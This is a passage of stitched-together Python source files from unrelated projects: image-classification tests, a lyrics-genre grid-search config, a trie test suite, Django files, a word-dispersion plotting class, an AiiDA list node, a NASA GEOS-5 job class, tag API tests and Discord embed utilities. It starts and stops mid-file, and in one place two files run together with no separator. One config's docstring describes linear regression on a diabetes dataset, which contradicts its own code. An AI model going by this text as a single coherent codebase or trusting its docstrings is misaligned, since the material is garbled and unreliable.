    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
def test_recognition_model_resnet_array_input():
    """ResNet50 classification from an in-memory BGR array (cv2.imread)
    returns parallel str/float lists."""
    predictor = ImageClassification()
    predictor.setModelTypeAsResNet50()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "resnet50_imagenet_tf.2.0.h5"))
    predictor.loadModel()
    # BUG FIX: duplicate main_folder argument removed from os.path.join.
    image_array = cv2.imread(os.path.join(main_folder, "data-images", "1.jpg"))
    predictions, probabilities = predictor.classifyImage(image_input=image_array, input_type="array")
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
def test_recognition_model_inceptionv3_array_input():
    """InceptionV3 classification from an in-memory array returns parallel
    str/float lists."""
    predictor = ImageClassification()
    predictor.setModelTypeAsInceptionV3()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "inception_v3_weights_tf_dim_ordering_tf_kernels.h5"))
    predictor.loadModel()
    # BUG FIX: duplicate main_folder argument removed from os.path.join.
    image_array = cv2.imread(os.path.join(main_folder, "data-images", "1.jpg"))
    predictions, probabilities = predictor.classifyImage(image_input=image_array, input_type="array")
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
def test_recognition_model_densenet_array_input():
    """DenseNet121 classification from an in-memory array returns parallel
    str/float lists."""
    predictor = ImageClassification()
    predictor.setModelTypeAsDenseNet121()
    predictor.setModelPath(os.path.join(main_folder, "data-models", "DenseNet-BC-121-32.h5"))
    predictor.loadModel()
    # BUG FIX: duplicate main_folder argument removed from os.path.join.
    image_array = cv2.imread(os.path.join(main_folder, "data-images", "1.jpg"))
    predictions, probabilities = predictor.classifyImage(image_input=image_array, input_type="array")
    assert isinstance(predictions, list)
    assert isinstance(probabilities, list)
    assert isinstance(predictions[0], str)
    assert isinstance(probabilities[0], float)
|
"""Config for a linear regression model evaluated on a diabetes dataset."""
from dbispipeline.evaluators import GridEvaluator
import dbispipeline.result_handlers as result_handlers
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import LinearSVR
from nlp4musa2020.dataloaders.alf200k import ALF200KLoader, genre_target_labels
import nlp4musa2020.evaluators as evaluators
from nlp4musa2020.models.simplenn_genre import SimpleGenreNN
# Load the ALF200K lyrics dataset restricted to statistical features,
# with genre labels as the prediction target.
dataloader = ALF200KLoader(
    'data/processed/dataset-lfm-genres.pickle',
    load_feature_groups=[
        'statistical',
    ],
    text_vectorizers=None,
    target=genre_target_labels()
)
# Standard-scale the features before the small dense genre network.
pipeline = Pipeline([
    ('scaler', StandardScaler()),
    ('model', SimpleGenreNN(epochs=50)),
])
# Grid search over network width and dropout rate.
evaluator = GridEvaluator(
    parameters={
        'model__dense_sizes': [
            (32, 32),
            (64, 64),
        ],
        'model__dropout_rate': [
            0.1,
        ],
    },
    grid_parameters=evaluators.grid_parameters_genres(),
)
# NOTE(review): this rebinding shadows the imported result_handlers
# module; the RHS is evaluated first, so the attribute lookup still hits
# the module — consider renaming the import to avoid confusion.
result_handlers = [
    result_handlers.print_gridsearch_results,
]
|
# Reversing an integer
def int_reversal(n):
    """Return *n* with its decimal digits reversed.

    The sign is preserved (e.g. -120 -> -21); 0 maps to 0. Python ints
    are arbitrary precision, so there is no overflow concern.
    """
    # BUG FIX: the original `while n > 0` loop never ran for negative
    # inputs and silently returned 0; handle the sign explicitly.
    sign = -1 if n < 0 else 1
    n = abs(n)
    reverse = 0
    while n > 0:
        n, digit = divmod(n, 10)
        reverse = reverse * 10 + digit
    return sign * reverse
if __name__ == '__main__':
    # Demo: reverse a very large integer (arbitrary precision, so no
    # overflow concerns) and print before/after.
    num = 123456789123456789123456789
    print(num)
    num = int_reversal(num)
    print(num)
|
from oo.pessoa import Pessoa
# Instantiate Pessoa and print its concrete type, demonstrating that p
# is an instance of the imported class.
p = Pessoa()
print(type(p))
#!/usr/bin/env python
"""Test the mpu.datastructures.char_trie module."""
# Third party
import pytest
# First party
from mpu.datastructures.trie.char_trie import EMPTY_NODE, Trie, TrieNode
def test_trie_print():
    """Build a Trie from a word list and compare its rendered form."""
    data = ["dog", "cat", "cattle", "tom", "d", "tomcat", "tomatoe"]
    trie = Trie(data)
    trie_data = trie.print(print_stdout=False)
    # Expected rendering: the string contents below must match the Trie
    # renderer's output exactly, including any whitespace it emits.
    expected = """Trie
c
a
t
t
l
e
d
o
g
t
o
m
a
t
o
e
c
a
t"""
    assert trie_data == expected
    # Also exercise the stdout-printing branch for coverage.
    trie.print(print_stdout=True)
def test_create_trie_node_with_children():
    """Constructing a TrieNode with a pre-built child mapping must not raise."""
    child = TrieNode("a")
    TrieNode("b", children={"a": child})
def test_trie_node_push():
    """Pushing an empty string onto a TrieNode must raise ValueError."""
    trie_node = TrieNode(value="a")
    with pytest.raises(ValueError) as caught:
        trie_node.push("")
    assert str(caught.value) == "The pushed value should not be empty"
def test_get_subtrie_from_empty():
    """An empty prefix on an empty Trie yields the EMPTY_NODE sentinel."""
    trie = Trie()
    prefix, subtrie = trie.get_subtrie("")
    assert prefix == ""
    # Compare field by field: EMPTY_NODE is a sentinel, so attribute
    # equality (not object identity) is what matters here.
    assert (subtrie._value, subtrie.is_word) == (EMPTY_NODE._value, EMPTY_NODE.is_word)
    assert (subtrie.count, subtrie.children) == (EMPTY_NODE.count, EMPTY_NODE.children)
|
from django import VERSION
from autocomplete_light.compat import urls, url
# Route the root URL to the 'navigation_autocomplete' view.
# NOTE(review): string view references in url() were removed in newer
# Django; this relies on autocomplete_light's compat wrappers — confirm
# the supported Django version.
urlpatterns = urls([
    url(r'^$', 'navigation_autocomplete', name='navigation_autocomplete'),
])
|
# Librerias necesarias
import matplotlib.pyplot as plt
from matplotlib import cm
import numpy as np
import warnings
import itertools
import re
class dispersionPlot:
    """Lexical dispersion plot: shows where the given keywords occur
    across one or more documents.

    The constructor normalizes the input text(s), validates/deduplicates
    the keywords and pre-computes the (x, y) occurrence coordinates; call
    :meth:`graficar` to actually draw the plot.
    """

    def __init__(
        self,
        text,
        keywords,
        ignore_case=True,
        title="Gráfico de dispersión de palabras",
        label_x="Distribución de términos",
        label_y="Términos de interés",
        labels=None,
        auto_labels=True,
        figsize=(12, 7),
        marker="|",
        marker_size=20,
        marker_width=3,
        colors=None,
        cm="nipy_spectral",
        legend=True,
        rotation=30,
        show=True,
        outpath=None,
        return_fig=False,
    ):
        self._ignore_case = ignore_case
        self.textos = text  # property setter: cleans/tokenizes documents
        self.keywords = keywords  # property setter: dedups + validates
        self._title = title
        self._label_x = label_x
        self._label_y = label_y
        self._autolabels = auto_labels
        self.labels = labels
        self._marker = marker
        self._marker_size = marker_size
        self._marker_width = marker_width
        self._cm = cm
        self.colors = colors
        self._rotation = rotation
        self._legend = legend
        self._show = show
        self._outpath = outpath
        self._figsize = figsize
        self._return_fig = return_fig
        self._set_limites_x()
        self._calcular_dispersion()

    @property
    def textos(self):
        return self._textos

    @textos.setter
    def textos(self, text):
        if isinstance(text, str):
            # Single document: clean it and keep a one-element list.
            self._textos = [
                limpieza_basica(text, ignorar_mayus=self._ignore_case)
            ]
            self._all_words = " ".join(self._textos).split()
        elif all(isinstance(t, list) for t in text):
            # Already-tokenized documents (lists of words): use as-is.
            self._textos = text
            self._all_words = list(itertools.chain.from_iterable(text))
        elif isinstance(text, list):
            # List of raw strings: clean every document.
            self._textos = list(
                map(limpieza_basica, text, [self._ignore_case] * len(text))
            )
            self._all_words = " ".join(self._textos).split()
        else:
            raise ValueError(
                (
                    "Tipo de datos desconocido, por favor ingrese un texto "
                    "o una lista de textos"
                )
            )

    @property
    def keywords(self):
        return self._keywords

    @keywords.setter
    def keywords(self, keywords):
        if isinstance(keywords, list):
            if self._ignore_case:
                keywords = list(map(str.lower, keywords))
            if len(np.unique(keywords)) != len(keywords):
                warnings.warn(
                    "Existen palabras clave repetidas. Estás serán eliminadas"
                )
                # Drop duplicates but keep first-seen order.
                indexes = np.unique(keywords, return_index=True)[1]
                keywords = [keywords[index] for index in sorted(indexes)]
            # BUG FIX: always reverse and validate — previously these
            # steps only ran on the duplicate-keywords path, so
            # self._keywords was never set for duplicate-free input.
            keywords.reverse()
            self._comprobar_existencia(keywords)
        else:
            raise ValueError("Por favor ingrese una lista términos de interés")

    @property
    def labels(self):
        return self._labels

    @labels.setter
    def labels(self, labels):
        if labels is None and self._autolabels:
            # Auto-generate "Doc 1", "Doc 2", ... when allowed.
            self._labels = [f"Doc {i+1}" for i in range(len(self.textos))]
        elif labels is None:
            self._labels = None
        elif isinstance(labels, list):
            if len(labels) == len(self.textos):
                self._labels = labels
            else:
                raise ValueError(
                    (
                        "El número de etiquetas de entrada no es igual al "
                        "número de documentos."
                    )
                )
        else:
            raise ValueError(
                (
                    "El tipo de datos de las etiquetas no está permitido, "
                    "por favor ingrese una lista de etiquetas."
                )
            )

    @property
    def colors(self):
        return self._colors

    @colors.setter
    def colors(self, colors):
        if colors is None:
            # Derive one color per document from the configured colormap.
            self._colors = self._paleta_color()
        elif isinstance(colors, list):
            if len(colors) == len(self.textos):
                self._colors = colors
            else:
                raise ValueError(
                    (
                        "El número de colores de entrada debe ser igual al "
                        "número de documentos"
                    )
                )
        else:
            raise ValueError(
                (
                    "Tipo de datos en colores es desconocido, por favor"
                    "ingrese una lista de colores."
                )
            )

    def _set_limites_x(self):
        """Compute per-document end positions (word offsets) and the x tick
        position centered under each document."""
        try:
            limits = [len(t.split()) for t in self._textos]
        except Exception:
            # Already-tokenized documents have no .split(); use len().
            limits = [len(t) for t in self._textos]
        limits = np.cumsum(limits) - 1
        limits_ = np.insert(limits, 0, 0)
        x_pos = [
            limits_[i] + (limits_[i + 1] - limits_[i]) / 2
            for i in range(len(limits))
        ]
        self._limits = limits
        self._x_limits = x_pos

    def _comprobar_existencia(self, keywords):
        """Keep only the keywords that occur in the documents; warn about
        (or raise on) the missing ones."""
        missing = [w for w in keywords if w not in self._all_words]
        if not missing:
            self._keywords = keywords
            return
        if len(missing) == len(keywords):
            raise ValueError(
                ("No existe palabras claves asociada a los documentos.")
            )
        warnings.warn(
            (
                "Advertencia: las palabras: ({})".format(", ".join(missing))
                + " no están en los documentos de entrada"
            )
        )
        # BUG FIX: filter against the *list* of missing words. The original
        # filtered against the comma-joined string, so substring matches
        # wrongly dropped valid keywords (e.g. "cat" when "catalog" was
        # missing).
        self._keywords = [w for w in keywords if w not in missing]

    def _paleta_color(self):
        """Derive one distinguishable color per document from the colormap
        when the caller supplied no explicit colors."""
        cmap = cm.get_cmap(self._cm)
        niveles = len(self._textos)
        # Alternate between the low and high halves of the colormap so
        # neighboring documents get visually distinct colors.
        colores = [
            cmap(c / (2 * niveles)) if c % 2 else cmap(0.5 + c / (2 * niveles))
            for c in range(niveles)
        ]
        return colores

    def _calcular_dispersion(self):
        """Pre-compute the (x, y) coordinates of every keyword occurrence:
        x is the word position across the concatenated documents, y the
        keyword's row index."""
        # O(words) dict lookup instead of the original O(words * keywords)
        # double scan; keywords are unique after deduplication, so each
        # word maps to at most one row and the point order is unchanged.
        fila = {palabra: y for y, palabra in enumerate(self.keywords)}
        points = [
            (x, fila[palabra])
            for x, palabra in enumerate(self._all_words)
            if palabra in fila
        ]
        x, y = list(zip(*points))
        self._points_x = x
        self._points_y = y

    def graficar(self):
        """Draw the dispersion plot; optionally save it to ``outpath`` and
        show it. Returns the figure when ``return_fig`` is True, otherwise
        the axes."""
        x = np.asarray(self._points_x)
        y = np.asarray(self._points_y)
        fig, ax = plt.subplots(figsize=self._figsize)
        lines = list()
        for i, d in enumerate(self._limits):
            if i == 0:
                lines += ax.plot(
                    x[(x >= 0) & (x <= d)],
                    y[(x >= 0) & (x <= d)],
                    self._marker,
                    ms=self._marker_size,
                    mew=self._marker_width,
                    # Consistency fix: use the internal attribute like the
                    # branch below (self.colors is a property over it).
                    color=self._colors[i],
                )
            else:
                d_ant = self._limits[i - 1]
                lines += ax.plot(
                    x[(x > d_ant) & (x <= d)],
                    y[(x > d_ant) & (x <= d)],
                    self._marker,
                    ms=self._marker_size,
                    mew=self._marker_width,
                    color=self._colors[i],
                )
            # Dashed separator at each document boundary.
            ax.axvline(x=d + 0.5, color="lightgray", linestyle="dashed")
        # Shrink the axes to leave room for the legend on the right.
        box = ax.get_position()
        ax.set_position([box.x0, box.y0, box.width * 0.85, box.height])
        ax.set_title(self._title, {"fontsize": 15, "fontweight": 700})
        ax.set_xlabel(self._label_x)
        ax.set_xlim(-0.2, x[-1] + 0.2)
        ax.set_xticks(self._x_limits)
        if self._labels is not None:
            ax.set_xticklabels(self._labels, rotation=self._rotation)
        if self._legend:
            ax.legend(
                lines,
                self._labels,
                bbox_to_anchor=(1.003, 1),
                loc="upper left",
                markerscale=0.5,
                frameon=False,
            )
        ax.set_ylabel(self._label_y)
        ax.set_yticks(list(range(len(self.keywords))))
        ax.set_yticklabels(self._keywords)
        if self._outpath is not None:
            plt.savefig(
                self._outpath,
                bbox_inches="tight",
                transparent=False,
                facecolor="w",
                dpi=300,
            )
        if self._show:
            plt.show()
        if not self._show and self._outpath is None:
            warnings.warn("Por favor fije una ruta para guardar la imagen")
            plt.show()
        if self._return_fig:
            return fig
        return ax
def limpieza_basica(texto, ignorar_mayus=True):
    """Basic text cleanup: optional lowercasing, removal of characters
    outside letters (incl. Latin accents), digits and spaces, and
    whitespace normalization. Returns the cleaned string."""
    limpio = texto.lower() if ignorar_mayus else texto
    # Pad punctuation with spaces (kept for parity with tokenizers that
    # expect separated punctuation).
    limpio = re.sub(r"([\.\",\(\)!\?;:])", " \\1 ", limpio)
    # Replace any run of disallowed characters with a single space.
    # RegEx adapted from https://stackoverflow.com/a/56280214
    limpio = re.sub(r"[^ a-zA-ZÀ-ÖØ-öø-ÿ0-9]+", " ", limpio)
    # Collapse multiple spaces, then trim surrounding whitespace.
    limpio = re.sub(r" +", " ", limpio)
    return limpio.strip(" \t\n\r")
|
from django.db import models
# Create your models here.
class CodeProject(models.Model):
    """Portfolio entry for a single coding project."""
    name = models.CharField(max_length=200)
    description = models.TextField()
    # Optional URLs; blank=True lets forms leave them empty.
    demo_link = models.CharField(max_length=300,blank=True)
    repo_link = models.CharField(max_length=300,blank=True)
    class Meta:
        # Human-readable names shown in the Django admin.
        verbose_name = 'Code project'
        verbose_name_plural = 'Code projects'
    def __str__(self):
        # Display the project by its name (admin lists, shell repr, etc.).
        return self.name
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from collections import MutableSequence
from aiida.orm.data import Data
class List(Data, MutableSequence):
    """
    Class to store python lists as AiiDA nodes
    """
    _LIST_KEY = 'list'

    def __init__(self, **kwargs):
        # Default to an empty list when neither an initial list nor an
        # existing database node was supplied.
        if 'list' not in kwargs and 'dbnode' not in kwargs:
            kwargs['list'] = list()
        super(List, self).__init__(**kwargs)

    def __getitem__(self, item):
        return self.get_list()[item]

    def __setitem__(self, key, value):
        l = self.get_list()
        l[key] = value
        if not self._using_list_reference():
            self.set_list(l)

    def __delitem__(self, key):
        l = self.get_list()
        del l[key]
        if not self._using_list_reference():
            self.set_list(l)

    def __len__(self):
        return len(self.get_list())

    def __str__(self):
        return self.get_list().__str__()

    def __eq__(self, other):
        # Compare against another List node when possible, otherwise
        # against a plain python list.
        try:
            return self.get_list() == other.get_list()
        except AttributeError:
            return self.get_list() == other

    def __ne__(self, other):
        return not self == other

    def append(self, value):
        l = self.get_list()
        l.append(value)
        if not self._using_list_reference():
            self.set_list(l)

    def extend(self, L):
        l = self.get_list()
        l.extend(L)
        if not self._using_list_reference():
            self.set_list(l)

    def insert(self, i, value):
        l = self.get_list()
        l.insert(i, value)
        if not self._using_list_reference():
            self.set_list(l)

    def remove(self, value):
        # BUG FIX: this previously did `del self[value]`, i.e. deleted by
        # INDEX, while list.remove (and the MutableSequence contract)
        # removes the first occurrence of *value*.
        l = self.get_list()
        l.remove(value)
        if not self._using_list_reference():
            self.set_list(l)

    def pop(self, **kwargs):
        # BUG FIX: list.pop returns the removed item; this method used to
        # silently discard it.
        l = self.get_list()
        item = l.pop(**kwargs)
        if not self._using_list_reference():
            self.set_list(l)
        return item

    def index(self, value):
        return self.get_list().index(value)

    def count(self, value):
        return self.get_list().count(value)

    def sort(self, key=None, reverse=False):
        l = self.get_list()
        l.sort(key=key, reverse=reverse)
        if not self._using_list_reference():
            self.set_list(l)

    def reverse(self):
        l = self.get_list()
        l.reverse()
        if not self._using_list_reference():
            self.set_list(l)

    def get_list(self):
        """Return the underlying python list (a reference when unstored)."""
        try:
            return self.get_attr(self._LIST_KEY)
        except AttributeError:
            # Nothing stored yet: initialize to an empty list and retry.
            self.set_list(list())
            return self.get_attr(self._LIST_KEY)

    def set_list(self, list_):
        """Store *list_* as this node's content.

        :raises TypeError: if *list_* is not a python list
        """
        if not isinstance(list_, list):
            raise TypeError('Must supply list type')
        self._set_attr(self._LIST_KEY, list_)

    def _using_list_reference(self):
        """
        This function tells the class if we are using a list reference. This
        means that calls to self.get_list return a reference rather than a copy
        of the underlying list and therefore self.set_list need not be called.
        This knowledge is essential to make sure this class is performant.
        Currently the implementation assumes that if the node needs to be
        stored then it is using the attributes cache which is a reference.
        :return: True if using self.get_list returns a reference to the
            underlying sequence. False otherwise.
        :rtype: bool
        """
        return not self.is_stored
|
# +-======-+
# Copyright (c) 2003-2007 United States Government as represented by
# the Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# THIS OPEN SOURCE AGREEMENT ("AGREEMENT") DEFINES THE RIGHTS OF USE,
# REPRODUCTION, DISTRIBUTION, MODIFICATION AND REDISTRIBUTION OF CERTAIN
# COMPUTER SOFTWARE ORIGINALLY RELEASED BY THE UNITED STATES GOVERNMENT AS
# REPRESENTED BY THE GOVERNMENT AGENCY LISTED BELOW ("GOVERNMENT AGENCY").
# THE UNITED STATES GOVERNMENT, AS REPRESENTED BY GOVERNMENT AGENCY, IS AN
# INTENDED THIRD-PARTY BENEFICIARY OF ALL SUBSEQUENT DISTRIBUTIONS OR
# REDISTRIBUTIONS OF THE SUBJECT SOFTWARE. ANYONE WHO USES, REPRODUCES,
# DISTRIBUTES, MODIFIES OR REDISTRIBUTES THE SUBJECT SOFTWARE, AS DEFINED
# HEREIN, OR ANY PART THEREOF, IS, BY THAT ACTION, ACCEPTING IN FULL THE
# RESPONSIBILITIES AND OBLIGATIONS CONTAINED IN THIS AGREEMENT.
#
# Government Agency: National Aeronautics and Space Administration
# Government Agency Original Software Designation: GSC-15354-1
# Government Agency Original Software Title: GEOS-5 GCM Modeling Software
# User Registration Requested. Please Visit http://opensource.gsfc.nasa.gov
# Government Agency Point of Contact for Original Software:
# Dale Hithon, SRA Assistant, (301) 286-2691
#
# +-======-+
"""
This package implements the running of a segment: it runs a MAPL
application for a prescribed period of time (or the end of the
experiment, whichever is sooner.)
"""
from job import Job
class Run(Job):
    """Runs a MAPL application for one segment, delegating every lifecycle
    phase to its children between the pre- (``_x``) and post- (``x_``)
    hook methods."""
    def __init__(self,ConfigFile,Children=None):
        # Initialize Job specific stuff in base class
        # -------------------------------------------
        Job.__init__(self,ConfigFile)
        # BUG FIX: the original default `Children=[]` was a shared mutable
        # default argument — every Run created without children aliased the
        # same list. Default to a fresh list instead.
        self.Children = [] if Children is None else Children
    # -------------------
    # Per-segment Methods
    # -------------------
    def execute(self):
        """Executes the Application for one segment."""
        self.initialize()
        self.run()
        self.finalize()
    def initialize(self):
        # Pre-hook, then children (in order), then post-hook.
        self._initialize()
        for child in self.Children:
            child.initialize()
        self.initialize_()
    def run(self):
        self._run()
        for child in self.Children:
            child.run()
        self.run_()
    def finalize(self):
        self._finalize()
        for child in self.Children:
            child.finalize()
        self.finalize_()
    # -----------------
    # Per-job Methods
    # -----------------
    def signin(self):
        self._signin()
        for child in self.Children:
            child.signin()
        self.signin_()
    def signout(self):
        self._signout()
        for child in self.Children:
            child.signout()
        self.signout_()
    # ---------------------
    # No-op Default Methods
    # ---------------------
    # Subclasses override any of these hooks as needed.
    # No-op pre-child methods
    # -----------------------
    def _initialize(self): pass
    def _run(self): pass
    def _finalize(self): pass
    def _signin(self): pass
    def _signout(self): pass
    # No-op post-child methods
    # ------------------------
    def initialize_(self): pass
    def run_(self): pass
    def finalize_(self): pass
    def signin_(self): pass
    def signout_(self): pass
|
import json
from app.utils.testing import ApiTestCase
from app.tags.models import Tag, TagTranslation
from app import db
class ReviewsApiTest(ApiTestCase):
    """API tests for tag CRUD (/api/v1/tag) and listing (/api/v1/tags),
    including per-event admin permission checks."""
    def seed_static_data(self):
        """Create two events (each with its own admin), one regular user,
        and three tags (two on event1, one on event2) with translations."""
        self.event1 = self.add_event(key='event1')
        self.event2 = self.add_event(key='event2')
        self.user1 = self.add_user('event1admin@mail.com')
        self.user2 = self.add_user('event2admin@mail.com')
        self.user3 = self.add_user('user@mail.com')
        self.event1.add_event_role('admin', self.user1.id)
        self.event2.add_event_role('admin', self.user2.id)
        db.session.commit()
        self.tags = [
            Tag(self.event1.id),
            Tag(self.event1.id),
            Tag(self.event2.id)
        ]
        db.session.add_all(self.tags)
        db.session.commit()
        tag_translations = [
            TagTranslation(self.tags[0].id, 'en', 'English Tag 1 Event 1'),
            TagTranslation(self.tags[0].id, 'fr', 'French Tag 1 Event 1'),
            TagTranslation(self.tags[1].id, 'en', 'English Tag 2 Event 1'),
            TagTranslation(self.tags[1].id, 'fr', 'French Tag 2 Event 1'),
            TagTranslation(self.tags[2].id, 'en', 'English Tag 1 Event 2')
        ]
        db.session.add_all(tag_translations)
        db.session.commit()
        # Auth headers for the two event admins and the plain user.
        self.user1_headers = self.get_auth_header_for('event1admin@mail.com')
        self.user2_headers = self.get_auth_header_for('event2admin@mail.com')
        self.user3_headers = self.get_auth_header_for('user@mail.com')
    def test_get_tag(self):
        """Test typical get request."""
        self.seed_static_data()
        params = {'id': 1, 'event_id': 1}
        response = self.app.get('/api/v1/tag', headers=self.user1_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(data['id'], 1)
        self.assertEqual(data['event_id'], 1)
        # All translations are returned keyed by language code.
        self.assertDictEqual(data['name'], {
            'en': 'English Tag 1 Event 1',
            'fr': 'French Tag 1 Event 1'
        })
    def test_get_event_admin(self):
        """Check a non event admin can't get a tag."""
        self.seed_static_data()
        params = {'id': 1, 'event_id': 1}
        response = self.app.get('/api/v1/tag', headers=self.user3_headers, data=params)
        self.assertEqual(response.status_code, 403)
    def test_get_event_admin_correct_event(self):
        """Check that an event admin for a different event can't get a tag."""
        self.seed_static_data()
        params = {'id': 1, 'event_id': 1}
        response = self.app.get('/api/v1/tag', headers=self.user2_headers, data=params)
        self.assertEqual(response.status_code, 403)
    def test_typical_post(self):
        """Test a typical post request."""
        self.seed_static_data()
        params = {
            'event_id': 2,
            'name': {
                'en': 'English Tag 2 Event 2',
                'fr': 'French Tag 2 Event 2',
            }
        }
        response = self.app.post(
            '/api/v1/tag',
            headers=self.user2_headers,
            data=json.dumps(params),
            content_type='application/json')
        self.assertEqual(response.status_code, 201)
        data = json.loads(response.data)
        new_id = data['id']
        # Round-trip: fetch the tag we just created and verify its fields.
        response = self.app.get('/api/v1/tag', headers=self.user2_headers, data={'id': new_id, 'event_id': 2})
        data = json.loads(response.data)
        self.assertEqual(data['id'], new_id)
        self.assertEqual(data['event_id'], 2)
        self.assertDictEqual(data['name'], {
            'en': 'English Tag 2 Event 2',
            'fr': 'French Tag 2 Event 2'
        })
    def test_post_event_admin(self):
        """Test that a non-event admin can't post a new tag."""
        self.seed_static_data()
        params = {
            'event_id': 2,
            'name': {
                'en': 'English Tag 2 Event 2',
                'fr': 'French Tag 2 Event 2',
            }
        }
        # User 1 is not an event admin for event 2
        response = self.app.post(
            '/api/v1/tag',
            headers=self.user1_headers,
            data=json.dumps(params),
            content_type='application/json')
        self.assertEqual(response.status_code, 403)
    def test_put(self):
        """Test typcial put request."""
        self.seed_static_data()
        params = {
            'id': 2,
            'event_id': 1,
            'name': {
                'en': 'Renamed English Name', # Rename
                'zu': 'Zulu Name'
            }
        }
        response = self.app.put(
            '/api/v1/tag',
            headers=self.user1_headers,
            data=json.dumps(params),
            content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # The update replaces the translation set (fr is gone, zu added).
        response = self.app.get('/api/v1/tag', headers=self.user1_headers, data={'id': 2, 'event_id': 1})
        data = json.loads(response.data)
        self.assertEqual(data['id'], 2)
        self.assertEqual(data['event_id'], 1)
        self.assertDictEqual(data['name'], {
            'en': 'Renamed English Name',
            'zu': 'Zulu Name'
        })
    def test_tag_list(self):
        """Test that a list of tags can be retrieved in the correct language."""
        self.seed_static_data()
        params = {
            'event_id': 1,
            'language': 'en'
        }
        response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(len(data), 2)
        self.assertEqual(data[0]['id'], 1)
        self.assertEqual(data[0]['event_id'], 1)
        self.assertEqual(data[0]['name'], 'English Tag 1 Event 1')
        self.assertEqual(data[1]['id'], 2)
        self.assertEqual(data[1]['event_id'], 1)
        self.assertEqual(data[1]['name'], 'English Tag 2 Event 1')
        params = {
            'event_id': 1,
            'language': 'fr'
        }
        response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(len(data), 2)
        self.assertEqual(data[0]['id'], 1)
        self.assertEqual(data[0]['event_id'], 1)
        self.assertEqual(data[0]['name'], 'French Tag 1 Event 1')
        self.assertEqual(data[1]['id'], 2)
        self.assertEqual(data[1]['event_id'], 1)
        self.assertEqual(data[1]['name'], 'French Tag 2 Event 1')
    def test_tag_list_default_language(self):
        """Test that the language defaults to English when not found."""
        self.seed_static_data()
        params = {
            'event_id': 2,
            'language': 'zu'
        }
        response = self.app.get('/api/v1/tags', headers=self.user2_headers, data=params)
        data = json.loads(response.data)
        self.assertEqual(len(data), 1)
        self.assertEqual(data[0]['id'], 3)
        self.assertEqual(data[0]['event_id'], 2)
        self.assertEqual(data[0]['name'], 'English Tag 1 Event 2')
|
"""
This file is a part of the source code for the PygameCommunityBot.
This project has been licensed under the MIT license.
Copyright (c) 2020-present PygameCommunityDiscord
This file defines some important embed related utility functions.
"""
from __future__ import annotations
import asyncio
import datetime
import io
import json
import re
from ast import literal_eval
from collections.abc import Mapping
from typing import Union, Optional, Any
import black
import discord
from discord.embeds import EmptyEmbed
from pgbot import common
EMBED_TOP_LEVEL_ATTRIBUTES_MASK_DICT = {
"provider": None,
"type": None,
"title": None,
"description": None,
"url": None,
"color": None,
"timestamp": None,
"footer": None,
"thumbnail": None,
"image": None,
"author": None,
"fields": None,
}
EMBED_TOP_LEVEL_ATTRIBUTES_SET = {
"provider",
"type",
"title",
"description",
"url",
"color",
"timestamp",
"footer",
"thumbnail",
"image",
"author",
"fields",
}
EMBED_SYSTEM_ATTRIBUTES_MASK_DICT = {
"provider": {
"name": None,
"url": None,
},
"type": None,
"footer": {
"proxy_icon_url": None,
},
"thumbnail": {
"proxy_url": None,
"width": None,
"height": None,
},
"image": {
"proxy_url": None,
"width": None,
"height": None,
},
"author": {
"proxy_icon_url": None,
},
}
EMBED_SYSTEM_ATTRIBUTES_SET = {
"provider",
"proxy_url",
"proxy_icon_url",
"width",
"height",
"type",
}
EMBED_NON_SYSTEM_ATTRIBUTES_SET = {
"name",
"value",
"inline",
"url",
"image",
"thumbnail",
"title",
"description",
"color",
"timestamp",
"footer",
"text",
"icon_url",
"author",
"fields",
}
EMBED_ATTRIBUTES_SET = {
"provider",
"name",
"value",
"inline",
"url",
"image",
"thumbnail",
"proxy_url",
"type",
"title",
"description",
"color",
"timestamp",
"footer",
"text",
"icon_url",
"proxy_icon_url",
"author",
"fields",
}
EMBED_ATTRIBUTES_WITH_SUB_ATTRIBUTES_SET = {
"author",
"thumbnail",
"image",
"fields",
"footer",
"provider",
} # 'fields' is a special case
DEFAULT_EMBED_COLOR = 0xFFFFAA
CONDENSED_EMBED_DATA_LIST_SYNTAX = """
# Condensed embed data list syntax. String elements that are empty "" will be ignored.
# The list must contain at least one argument.
[
'author.name' or ('author.name', 'author.url') or ('author.name', 'author.url', 'author.icon_url'), # embed author
'title' or ('title', 'url') or ('title', 'url', 'thumbnail.url'), #embed title, url, thumbnail
'''desc.''' or ('''desc.''', 'image.url'), # embed description, image
0xabcdef, # or -1 for default embed color
[ # embed fields
'''
<field.name|
...field.value....
|field.inline>
''',
],
'footer.text' or ('footer.text', 'footer.icon_url'), # embed footer
datetime(year, month, day[, hour[, minute[, second[, microsecond]]]]) or '2021-04-17T17:36:00.553' # embed timestamp
]
"""
def recursive_update(
    old_dict: dict,
    update_dict: Mapping,
    add_new_keys: bool = True,
    skip_value: str = "\0",
):
    """Recursively merge *update_dict* into *old_dict* in place.

    Like ``dict.update()``, but values that are mappings are merged
    instead of replaced. Values equal to *skip_value* are ignored, and
    brand-new keys are only added when *add_new_keys* is True.
    Returns *old_dict*. Based on the answers in
    https://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth
    """
    for key, value in update_dict.items():
        if isinstance(value, Mapping):
            # Merge into the existing sub-dict (or a scratch dict when the
            # key is absent) before deciding whether to attach the result.
            merged = recursive_update(
                old_dict.get(key, {}),
                value,
                add_new_keys=add_new_keys,
                skip_value=skip_value,
            )
            if merged == skip_value:
                continue
            if key not in old_dict and not add_new_keys:
                continue
